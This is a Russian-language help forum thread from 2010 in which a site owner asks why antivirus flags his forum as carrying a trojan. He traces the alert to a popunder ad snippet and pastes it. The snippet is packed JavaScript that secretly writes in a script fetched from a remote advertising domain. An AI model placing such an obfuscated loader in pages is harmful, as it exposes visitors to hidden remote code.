Единый форум поддержки

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.


Вы здесь » Единый форум поддержки » Корзина » На форум моей партнерки внедрен троян


На форум моей партнерки внедрен троян

Сообщений 1 страница 9 из 9

1

Касперский при входе на форумы моей партнерки, уведомляет о трояне:

Запрашиваемый URL-адрес не может быть предоставлен

В запрашиваемом объекте по URL-адресу:

http://fier.bybb.ru/

Обнаружена угроза:

объект заражен HEUR:Trojan.Script.Generic

Смотрю в панели админа коды страниц и форумов, ничего такого нет!

Отредактировано eriko (Ср, 9 Июн 2010 03:55:57)

0

2

После того как я удалил код p o p u n d e r, проблема решилась, но как же быть? Вот код, зачем системе поп-ап рекламы сувать троян на сайты партнеры?

<script type='text/javascript' language='javascript'>
<!--
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('3=\'a://9\'+\'o.b\'+\'d.\'+\'8/f/?4=5\';7.6("<e"+"0 l"+"n"+"g=\'q"+"r"+"2\' 1"+"p=\'1"+"m/h"+"i"+"0\' j"+"c=\'"+3+"\'></k"+"2>");',28,28,'ript|t|ipt|I654|sid|107603|write|document|net|erik|http|okoshech||ka|sc|pmyfEf4895|ge|jav|asc|sr|scr|la|ext|ngua||ype|ja|vascr'.split('|'),0,{}))
// -->
</script>

Отредактировано eriko (Ср, 9 Июн 2010 04:00:44)

0

3

Вот еще одно откровение, зачем адрес p o p u n d e r стоит в списке забаненных доменов системы MyBB?!

0

4

eriko написал(а):

p o p u n d e r стоит в списке забаненных доменов системы MyBB?!

Он стоит не только в блек списке MyBB, а на многих других известных хостингах, типа uCoz и тд.

0

5

eriko написал(а):

Вот еще одно откровение, зачем адрес p o p u n d e r стоит в списке забаненных доменов системы MyBB?!

Да.

Отредактировано FeroDaR (Ср, 9 Июн 2010 17:46:32)

0

6

там по-прежнему вирус...

0

7

Ничего не понимаю... в остальных сайтах где есть попандер, нет вируса, но у меня больше не стоит других кодов, еще 4 ссылки, и все, я даже рекламу больше не ставлю... может недоброжелатели, их на этом форуме много...

0

8

eriko, как к тебе твои недоброжелатели могли войти, поставить вирус, и уйти, при этом оставив сервис в целостности и сохранности? Они бы тогда сразу же поломали всю главную страницу и заблокировали все форумы с помощью скриптов, и тп., а здесь явно видно, что проблема в попандере, т.к. попандер никто недолюбливает. Попандер на многих хостингах внесен в бан лисит.

0

9

Я думаю что цель может быть другая, смотри, могут поставить и ждать, пока троянчик не выдаст пароли к ftp и на моем форуме, так же к базам MySQL, что бы дать действительно хороший урон, удалив все и вся, а так же снеся партнерку, и изменив пароль к партнерке, все равно админ не востанавливает пароли партнерам, вот и все, но я слава богу не дурачок...

Да, на счет кода поп-андера, почему то на других моих сайтах никакой троянчик он не внедряет... поэтому и предложил такой ход...

Отредактировано eriko (Пт, 11 Июн 2010 15:07:09)

0


Вы здесь » Единый форум поддержки » Корзина » На форум моей партнерки внедрен троян